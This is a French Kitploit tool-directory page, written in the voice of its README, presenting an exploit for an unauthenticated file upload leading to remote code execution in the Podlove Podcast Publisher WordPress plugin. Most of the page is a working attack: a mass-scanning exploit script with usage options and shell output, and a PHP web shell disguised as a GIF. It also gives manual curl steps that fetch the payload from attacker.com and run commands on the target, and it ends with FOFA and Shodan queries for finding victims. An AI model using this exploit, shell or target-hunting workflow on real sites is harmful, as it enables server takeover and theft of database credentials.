Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-13001 — Exploit pour CVE-2026-13001, un téléversement de fichier arbitraire non authentifié dans le plugin WordPress Podlove Podcast Publisher, permettant l'exécution de code à distance via un téléversement de fichier polyglotte PHP. Inclut des modes de scan sur cible unique et en masse. | Kitploit
Outils/GitHubGitHub/byt3l0rd/cve-2026-13001
Scanners de VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubbyt3l0rd/cve-2026-13001

CVE-2026-13001

Exploit pour CVE-2026-13001, un téléversement de fichier arbitraire non authentifié dans le plugin WordPress Podlove Podcast Publisher, permettant l'exécution de code à distance via un téléversement de fichier polyglotte PHP. Inclut des modes de scan sur cible unique et en masse.

Voir le dépôt
il y a 11h 6mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-13001 — Podlove Podcast Publisher Téléversement de fichier non authentifié → RCE

Incohérence is_image() vs extract_file_extension() → Téléversement de polyglotte PHP


Vue d'ensemble

CVE-2026-13001 est une vulnérabilité de téléversement arbitraire de fichier non authentifiée de sévérité critique (CVSS 9.8) dans le plugin WordPress Podlove Podcast Publisher versions ≤ 4.5.1.

La vulnérabilité exploite une incohérence entre deux fonctions internes qui analysent les extensions de fichier différemment :

  • is_image() utilise basename() qui inclut les chaînes de requête → l'URL shell.php?.gif apparaît comme .gif ✅ (image valide)
  • extract_file_extension() utilise uniquement le chemin de parse_url() → renvoie .php → le fichier est enregistré avec l'extension .php 🚨

Les attaquants téléversent des polyglottes PHP GIF89a (en-tête GIF valide + PHP intégré) qui passent la validation d'image mais s'exécutent comme PHP lorsqu'ils sont accédés.

Versions affectées

VersionStatut
≤ 4.5.1Vulnérable
4.5.2+Corrigée

Découverte par : Talal Nasraddeen via Wordfence (14 juillet 2026)


Mécanisme de la vulnérabilité

Cause racine

root@kitploit:~
// is_image() — utilise basename() qui inclut la chaîne de requête
function is_image($url) {
    $ext = strtolower(pathinfo(basename($url), PATHINFO_EXTENSION));
    return in_array($ext, ['jpg','jpeg','png','gif','webp']);
}
// URL: https://attacker.com/shell.php?.gif
// basename() → "shell.php?.gif" → ext = "gif" ✅ CONTOURNÉ
root@kitploit:~
// extract_file_extension() — utilise uniquement le chemin de parse_url()
function extract_file_extension($url) {
    $path = parse_url($url, PHP_URL_PATH);
    return pathinfo($path, PATHINFO_EXTENSION);
}
// URL: https://attacker.com/shell.php?.gif
// parse_url() → "/shell.php" → ext = "php" 🚨 ENREGISTRÉ COMME .php

Déroulement de l'attaque

root@kitploit:~
1. L'attaquant héberge un polyglotte PHP GIF89a sur attacker.com/shell.php?.gif
2. GET /?podlove_image_cache_url={hex(url)}&podlove_file_name=test
3. is_image() valide l'extension .gif → RÉUSSI
4. Le plugin télécharge le fichier → l'enregistre comme test_original.php dans cache/
5. L'attaquant accède à /wp-content/cache/podlove/{hash}/test_original.php
6. PHP s'exécute → RCE

Installation

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-13001.git
cd CVE-2026-13001
pip install -r requirements.txt

Utilisation

root@kitploit:~
# Cible unique
python cve_2026_13001.py -t target.com

# Analyse de masse
python cve_2026_13001.py -f targets.txt -o shells.txt

# URL de payload personnalisée
python cve_2026_13001.py -t target.com --payload-url https://yourserver/shell.php?.gif

# Mode débogage, conserver les shells
python cve_2026_13001.py -t target.com --debug --no-cleanup

Arguments

root@kitploit:~
  -t, --target       Cible unique (domaine ou IP)
  -f, --file         Liste de cibles, une par ligne
  -o, --output       Enregistrer les URL RCE dans un fichier
  --payload-url      URL hébergeant le polyglotte PHP (défaut : GitHub raw)
  --threads          Workers simultanés (défaut : 30)
  --no-cleanup       Conserver les shells sur la cible
  --debug            Afficher chaque requête HTTP
  -v, --verbose      Sortie détaillée

Preuve de concept

Cible unique

root@kitploit:~
$ python cve_2026_13001.py -t podcast-site.com
root@kitploit:~
  Podlove Podcast Publisher | CVE-2026-13001 | CVSS 9.8

  Host       : podcast-site.com
  Podlove    : OUI v4.5.1
  Upload     : OUI
  RCE        : OUI
  Shell      : https://podcast-site.com/wp-content/cache/podlove/a1/b2.../think_xxx_original.php?t=TOKEN
  Output     : uid=33(www-data) gid=33(www-data)
  Time       : 4.2s

Analyse de masse

root@kitploit:~
  Targets: 500  |  Threads: 30
  Payload URL: https://raw.githubusercontent.com/shinthink/payloads/main/shell.gif

  [RCE] podcast-vuln-01.com       https://podcast-vuln-01.com/wp-content/cache/podlove/...
  [150/500] 30% | Det:42 RCE:8

Exploitation manuelle

Étape 1 — Héberger un shell polyglotte

root@kitploit:~
// shell.php — enregistrez et hébergez sur votre serveur
GIF89a<?php system($_GET['c']); ?>

Étape 2 — Encoder l'URL en hexadécimal avec le contournement

root@kitploit:~
# URL: https://attacker.com/shell.php?.gif
echo -n "https://attacker.com/shell.php?.gif" | xxd -p | tr -d '\n'

Étape 3 — Déclencher le téléchargement du cache

root@kitploit:~
curl 'https://target.com/?podlove_image_cache_url=68747470733a2f2f...&podlove_file_name=shell&podlove_width=100&podlove_height=100&podlove_crop=0'

Étape 4 — Accéder au shell

root@kitploit:~
# Chemin : wp-content/cache/podlove/{h[:2]}/{h[2:]}/{name}_original.php
curl 'https://target.com/wp-content/cache/podlove/a1/b2c3.../shell_original.php?c=id'

FOFA / Shodan

root@kitploit:~
FOFA:   body="podlove-podcasting-plugin-for-wordpress"
Shodan: http.html:"podlove"

Impact

Une exploitation réussie permet l'exécution de code à distance en tant qu'utilisateur du serveur web :

  • Extraire wp-config.php → identifiants de base de données
  • Accéder à tout le contenu WordPress, aux utilisateurs et aux données des plugins
  • Déployer des portes dérobées persistantes
  • Pivoter vers les réseaux internes

Avertissement

UNIQUEMENT À DES FINS ÉDUCATIVES ET DE TESTS AUTORISÉS.

Les auteurs déclinent toute responsabilité en cas d'utilisation abusive.


Références

RessourceLien
Avis Wordfencewordfence.com
Publication de sécurité Podlovepodlove.org
Entrée NVDCVE-2026-13001
ChercheurTalal Nasraddeen

Non affilié à Podlove.

Télécharger l’outil